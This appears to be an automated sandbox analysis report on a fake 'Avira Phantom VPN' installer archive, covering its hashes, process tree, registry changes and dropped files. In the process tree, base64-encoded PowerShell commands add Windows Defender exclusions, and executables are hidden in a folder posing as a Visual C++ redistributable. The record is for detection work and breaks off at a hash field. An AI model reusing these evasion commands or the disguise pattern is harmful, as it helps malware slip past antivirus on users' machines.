21eed4ad34b45a105a0d215f2bbd1dac8face384f0f75f621d10a3c4a3fe284f

Analysis

max time kernel
148s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
06-04-2023 12:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AviraPhantomVPN.7z
Size

28.6MB
MD5

edcaee17a820898e1ef4c3f1410d322d
SHA1

304a5c511e352ef0115d70b0dccb0f4802393b34
SHA256

645ff80fc1abf8919597a792ff5e26fb206f5ad0b5c08bf8a4a365585ca4ece0
SHA512

ce8637d4109997b01a43b4df6d6b0c78902533f56b750fb877044884e14497699239d8bd1ae17aee77bda9e5d4f3cfca4a080dc4b03294c109435fbcf302d2af
SSDEEP

786432:e6jVlMlC4wWESx547yBEQJXkE5Qa1z8eXY+o:bJ4Jn/x5JKQ9dxXY+o

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 5 IoCs

Processes:

AviraPhantomVPN.exeAviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpVCR-2005-2023-09.02.2023.exe

pid	process
4100	AviraPhantomVPN.exe
4044	AviraPhantomVPN.tmp
1160	Avira Phantom VPN 2.41.1.25731.exe
2148	Avira Phantom VPN 2.41.1.25731.tmp
5044	VCR-2005-2023-09.02.2023.exe

Loads dropped DLL 9 IoCs

Processes:

AviraPhantomVPN.tmpAvira Phantom VPN 2.41.1.25731.tmp

pid	process
4044	AviraPhantomVPN.tmp
4044	AviraPhantomVPN.tmp
4044	AviraPhantomVPN.tmp
4044	AviraPhantomVPN.tmp
4044	AviraPhantomVPN.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 6 IoCs

Processes:

AviraPhantomVPN.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	AviraPhantomVPN.tmp
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-A7IJG.tmp	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-3395V.tmp	AviraPhantomVPN.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.msg	AviraPhantomVPN.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 64 IoCs

Processes:

OpenWith.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 50003100000000005456b2a81000372d5a6970003c0009000400efbe5456b2a85456b2a82e000000fae7010000001f00000000000000000000000000000065cc770037002d005a0069007000000014000000	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\""	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell\open	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 8c003100000000005456afad110050524f4752417e310000740009000400efbe874fdb495456afad2e0000003f0000000000010000000000000000004a0000000000af335500500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell\open\command	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	OpenWith.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

AviraPhantomVPN.tmppowershell.exepowershell.exeAvira Phantom VPN 2.41.1.25731.tmp7zFM.exe

pid	process
4044	AviraPhantomVPN.tmp
4044	AviraPhantomVPN.tmp
2212	powershell.exe
2212	powershell.exe
3324	powershell.exe
3324	powershell.exe
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
1400	7zFM.exe
1400	7zFM.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

7zFM.exepowershell.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	1400	7zFM.exe
Token: 35	1400	7zFM.exe
Token: SeSecurityPrivilege	1400	7zFM.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

7zFM.exeAviraPhantomVPN.tmp

pid process

1400 7zFM.exe
1400 7zFM.exe
4044 AviraPhantomVPN.tmp

pid	process
1400	7zFM.exe
1400	7zFM.exe
4044	AviraPhantomVPN.tmp

Suspicious use of SetWindowsHookEx 23 IoCs

Processes:

OpenWith.exeAvira Phantom VPN 2.41.1.25731.tmp

pid	process
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
232	OpenWith.exe
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp
2148	Avira Phantom VPN 2.41.1.25731.tmp

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

OpenWith.exe7zFM.exeAviraPhantomVPN.exeAviraPhantomVPN.tmpcmd.exeAvira Phantom VPN 2.41.1.25731.exeAvira Phantom VPN 2.41.1.25731.tmpnet.exe

description	pid	process	target process
PID 232 wrote to memory of 1400	232	OpenWith.exe	7zFM.exe
PID 232 wrote to memory of 1400	232	OpenWith.exe	7zFM.exe
PID 1400 wrote to memory of 4100	1400	7zFM.exe	AviraPhantomVPN.exe
PID 1400 wrote to memory of 4100	1400	7zFM.exe	AviraPhantomVPN.exe
PID 1400 wrote to memory of 4100	1400	7zFM.exe	AviraPhantomVPN.exe
PID 4100 wrote to memory of 4044	4100	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 4100 wrote to memory of 4044	4100	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 4100 wrote to memory of 4044	4100	AviraPhantomVPN.exe	AviraPhantomVPN.tmp
PID 4044 wrote to memory of 3264	4044	AviraPhantomVPN.tmp	cmd.exe
PID 4044 wrote to memory of 3264	4044	AviraPhantomVPN.tmp	cmd.exe
PID 4044 wrote to memory of 3264	4044	AviraPhantomVPN.tmp	cmd.exe
PID 3264 wrote to memory of 2212	3264	cmd.exe	powershell.exe
PID 3264 wrote to memory of 2212	3264	cmd.exe	powershell.exe
PID 3264 wrote to memory of 2212	3264	cmd.exe	powershell.exe
PID 3264 wrote to memory of 3324	3264	cmd.exe	powershell.exe
PID 3264 wrote to memory of 3324	3264	cmd.exe	powershell.exe
PID 3264 wrote to memory of 3324	3264	cmd.exe	powershell.exe
PID 4044 wrote to memory of 1160	4044	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 4044 wrote to memory of 1160	4044	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 4044 wrote to memory of 1160	4044	AviraPhantomVPN.tmp	Avira Phantom VPN 2.41.1.25731.exe
PID 1160 wrote to memory of 2148	1160	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1160 wrote to memory of 2148	1160	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 1160 wrote to memory of 2148	1160	Avira Phantom VPN 2.41.1.25731.exe	Avira Phantom VPN 2.41.1.25731.tmp
PID 2148 wrote to memory of 3112	2148	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 2148 wrote to memory of 3112	2148	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 2148 wrote to memory of 3112	2148	Avira Phantom VPN 2.41.1.25731.tmp	net.exe
PID 3112 wrote to memory of 4296	3112	net.exe	net1.exe
PID 3112 wrote to memory of 4296	3112	net.exe	net1.exe
PID 3112 wrote to memory of 4296	3112	net.exe	net1.exe
PID 4044 wrote to memory of 5044	4044	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe
PID 4044 wrote to memory of 5044	4044	AviraPhantomVPN.tmp	VCR-2005-2023-09.02.2023.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z
1⤵
- Modifies registry class
PID:2560

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:232

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1400

C:\Users\Admin\AppData\Local\Temp\7zO8751CA57\AviraPhantomVPN.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8751CA57\AviraPhantomVPN.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4100

C:\Users\Admin\AppData\Local\Temp\is-129BQ.tmp\AviraPhantomVPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-129BQ.tmp\AviraPhantomVPN.tmp" /SL5="$30256,28849760,1046016,C:\Users\Admin\AppData\Local\Temp\7zO8751CA57\AviraPhantomVPN.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\WebrootCommAgentService.bat""
5⤵
- Suspicious use of WriteProcessMemory
PID:3264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAnACkA
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAXABBAHAAcABEAGEAdABhACcAKQA=
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324

C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
"C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1160

C:\Users\Admin\AppData\Local\Temp\is-8JNMU.tmp\Avira Phantom VPN 2.41.1.25731.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8JNMU.tmp\Avira Phantom VPN 2.41.1.25731.tmp" /SL5="$2023A,7215309,64512,C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\SysWOW64\net.exe
"net" stop "AviraPhantomVPN"
7⤵
- Suspicious use of WriteProcessMemory
PID:3112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "AviraPhantomVPN"
8⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\VCR-2005-2023-09.02.2023.exe
"C:\Users\Admin\AppData\Local\Temp\is-CEMTL.tmp\\VCR-2005-2023-09.02.2023.exe"
5⤵
- Executes dropped EXE
PID:5044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
